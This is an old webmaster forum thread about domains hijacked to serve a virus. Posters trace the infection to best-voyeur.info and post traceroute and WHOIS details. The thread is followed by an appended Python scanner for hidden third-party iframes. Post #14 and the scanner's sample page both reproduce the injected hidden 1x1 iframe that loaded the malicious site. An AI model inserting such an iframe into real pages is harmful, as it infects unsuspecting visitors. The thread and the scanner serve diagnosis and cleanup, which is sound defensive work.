Old 04-12-2005, 04:51 AM   #1
Dagwolf
President of Canada
 
Join Date: Sep 2003
Location: Leaving Hell, Entering Limbo
Posts: 23,141
Help! Domain spoofing...

I have a problem with a couple of domains. I lost contact with the host they were on and could no longer log in to ftp.

One of the domains, when I attempt to reach it, seems to load the correct page BUT with a virus! No virus on the other site's index page but it too has been obviously tampered with.

I pointed the domains to a new host and was shocked to find that they STILL load the same pages! With a little research I deduced that someone is "spoofing" my domains..

What I don't know is, how do I stop it?
__________________
Sleep well, and dream of large women.

Old 04-12-2005, 04:53 AM   #2
megatgpdotnet
Confirmed User
 
Join Date: Jun 2004
Location: EU
Posts: 1,296
Have you tried to scan your PC with antispyware? How about accessing the sites through another computer?
Old 04-12-2005, 04:57 AM   #3
Dagwolf
Quote:
Originally Posted by megatgpdotnet
Have you tried to scan your PC with antispyware? How about accessing the sites through another computer?
Both. Anyone attempting to access these domains is directed undetectably to a duplicate site which is neither on my old host nor on my new one, altered to suit someone else's purposes.
Old 04-12-2005, 05:40 AM   #4
Dagwolf
Still stuck
Old 04-12-2005, 05:46 AM   #5
Dagwolf
Might changing registrars help?
Old 04-12-2005, 06:12 AM   #6
Boss Traffic Jim
Confirmed User
 
Join Date: Nov 2002
Location: USA
Posts: 1,150
Pretty much sounds near impossible. Can you give the URLs so we can investigate it for you?
Old 04-12-2005, 06:21 AM   #7
Dagwolf
Quote:
Originally Posted by megatgpdotnet
Have you tried to scan your PC with antispyware? How about accessing the sites through another computer?
Using a proxy server, I was able to reach the correct site.
Old 04-12-2005, 06:22 AM   #8
Dagwolf
Quote:
Originally Posted by Afrin
Pretty much sounds near impossible. Can you give the URLs so we can investigate it for you?
I don't want to be responsible for the spread of a virus that appears to be coming from one of my websites...
Old 04-12-2005, 06:25 AM   #9
Dagwolf
Does this help?

Quote:
Tracert to (mydomain).com
Generated by www.DNSstuff.com at 13:23:32 GMT on 12 Apr 2005.

Hop | Time 1 | Time 2 | Time 3 | IP | Hostname | Return TTL | Country | Time
1 | 2 ms | 7 ms | 6 ms | 206.196.11.254 | [www.DNSstuff.com 1st hop] | 64 | United States |
2 | 3 ms | 6 ms | 5 ms | 216.26.129.91 | core-rtr02.ge-1-3-0.sdf.xodiax.net. | 252 | United States |
3 | 68 ms | 410 ms | 27 ms | 216.26.129.91 | core-rtr02.ge-1-3-0.sdf.xodiax.net. | 252 | United States |
4 | 10 ms | 13 ms | 12 ms | 216.26.128.181 | edge-rtr02.ge-0-3-0.sdf.xodiax.net. | 252 | United States |
5 | 8 ms | 17 ms | 17 ms | 65.117.168.137 | chi-edge-09.inet.qwest.net. | 251 | United States | Unix: 13:23:33.426
6 | 8 ms | 14 ms | 14 ms | 205.171.20.121 | chi-core-01.inet.qwest.net. | 250 | United States |
7 | 8 ms | 12 ms | 11 ms | 205.171.205.34 | cer-core-01.inet.qwest.net. | 249 | United States |
8 | 8 ms | 20 ms | 20 ms | 205.171.139.146 | chp-brdr-01.inet.qwest.net. | 249 | United States |
9 | 8 ms | 11 ms | 11 ms | 208.50.13.249 | so3-1-1-622M.ar1.CHI2.gblx.net. | 247 | United States | Unix: 13:23:33.642
10 | 72 ms | 81 ms | 90 ms | 67.17.66.169 | so1-0-0-2488M.ar2.TPA1.gblx.net. | 245 | United States |
11 | 100 ms | 108 ms | 118 ms | 64.215.80.66 | ExpedientSago-NetworksDashboard-Communications.ge-2-0-0.ar2.TPA1.gblx.net. | 55 | United States |
12 | 77 ms | 99 ms | 131 ms | 65.110.32.8 | gi0-1.ds01.tpa.sagonet.net. | 245 | United States | Unix: 13:23:33.994
13 | 68 ms | 77 ms | 86 ms | 63.246.157.19 | [Reached Destination] unknown.sagonet.net. | 53 | United States |
Old 04-12-2005, 07:36 AM   #10
Dagwolf
Domain is redirecting to best-voyeur.info, which is the actual source of the virus (don't GO there unless you're a pro!)

It seems to be some sort of Java applet / infects the computer with iworm-bofra according to AVG.

Fake phone number, obviously..

Domain ID:D7816484-LRMS
Domain Name:BEST-VOYEUR.INFO
Created On:25-Oct-2004 14:39:24 UTC
Last Updated On:09-Dec-2004 13:08:11 UTC
Expiration Date:25-Oct-2005 14:39:24 UTC
Sponsoring Registrar:R136-LRMS
Status:ACTIVE
Status:OK
Registrant ID:C7175719-LRMS
Registrant Name:Edward Lester
Registrant Street1:7338 Flamingo
Registrant City:Algonac
Registrant State/Province:MI
Registrant Postal Code:48001
Registrant Country:US
Registrant Phone:+1.10234567
Registrant *****************@yahoo.com
Old 07-13-2005, 05:11 PM   #11
DirkPitt
Confirmed User
 
Join Date: Sep 2002
Location: Mars
Posts: 357
I just noticed this exact thing happening to one of my domains. It's redirecting to the same place, best-voyeur.info. Like Dagwolf said, DON'T GO THERE!!! It's not a virus on the end user; to me it looks like somebody hacked into the server and made the modifications to the index.htm. I just uploaded a backup index and the problem went away. This post started 4/12; anybody know anything more?
__________________
Thanks,
Kit
Old 07-13-2005, 05:12 PM   #12
4Pics
Confirmed User
 
Join Date: Dec 2001
Posts: 7,952
You might want to see what scripts you are running... if phpbb then it could be that.
Old 07-13-2005, 05:18 PM   #13
DirkPitt
Quote:
Originally Posted by 4Pics
You might want to see what scripts you are running... if phpbb then it could be that.
The only script on the index is a banner js. I fixed the problem by just uploading a backup I had. That's why I think somebody got in there.
Old 07-13-2005, 06:00 PM   #14
DirkPitt
This is what I found in my index file.

Code:
<div style="visibility:hidden"><iframe src=" http://best-voyeur.info/ggl/" width=1 height=1></iframe></div>
Old 07-13-2005, 06:09 PM   #15
Quickdraw
Confirmed User
 
Join Date: Mar 2004
Location: → → →
Posts: 1,717
These sites have that code as well (at least the few I checked)
http://www.google.com/search?hl=en&l...t-voyeur.info/
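A defensive check for the kind of injection found in this thread, added here as an example and not code from any poster: it parses a page and reports iframes that are hidden (by their own or an ancestor's style) or 1x1 and that load from a host outside the site's own. The names `scan` and `HiddenFrameFinder`, the example.com / example.org hosts and the sample page are assumptions constructed for the illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

VOID = {"area", "base", "br", "col", "embed", "hr", "img", "input",
        "link", "meta", "source", "track", "wbr"}  # never get an end tag

def _hidden(attrs):
    style = (attrs.get("style") or "").replace(" ", "").lower()
    return "visibility:hidden" in style or "display:none" in style

def _tiny(attrs):  # width or height of 0 or 1 pixel
    dims = (re.fullmatch(r"\s*(\d+)(px)?\s*", attrs.get(n) or "") for n in ("width", "height"))
    return any(m and int(m.group(1)) <= 1 for m in dims)

class HiddenFrameFinder(HTMLParser):
    def __init__(self, own_hosts):
        super().__init__()
        self.own_hosts = {h.lower() for h in own_hosts}
        self.stack, self.findings = [], []  # open (tag, hides_content); (line, src, reasons)

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            src = (a.get("src") or "").strip()  # the posted snippet has a leading space
            host = (urlparse(src).hostname or "").lower()
            hidden = _hidden(a) or any(h for _, h in self.stack)
            reasons = ["hidden"] * hidden + ["1x1 or smaller"] * _tiny(a)
            if reasons and host and host not in self.own_hosts:
                self.findings.append((self.getpos()[0], src, reasons))
        if tag not in VOID:
            self.stack.append((tag, _hidden(a)))

    def handle_endtag(self, tag):  # pop back to the matching open tag, if any
        tags = [t for t, _ in self.stack]
        if tag in tags:
            del self.stack[len(tags) - 1 - tags[::-1].index(tag):]

def scan(html, own_hosts):
    finder = HiddenFrameFinder(own_hosts)
    finder.feed(html)
    finder.close()
    return finder.findings

# Constructed page: own banner, the injected frame from the thread, a visible third-party ad
SAMPLE = """<html><body><p>Welcome
<iframe src="http://www.example.com/banner.html" width=468 height=60></iframe>
<div style="visibility:hidden"><iframe src=" http://best-voyeur.info/ggl/" width=1 height=1></iframe></div>
<iframe src="http://ads.example.org/b.html" width=468 height=60></iframe>
</body></html>"""
```

Run `scan` over every HTML file in the web root after restoring from backup; a finding means the file was modified on the server, so the access path (FTP credentials, vulnerable scripts) still needs to be closed.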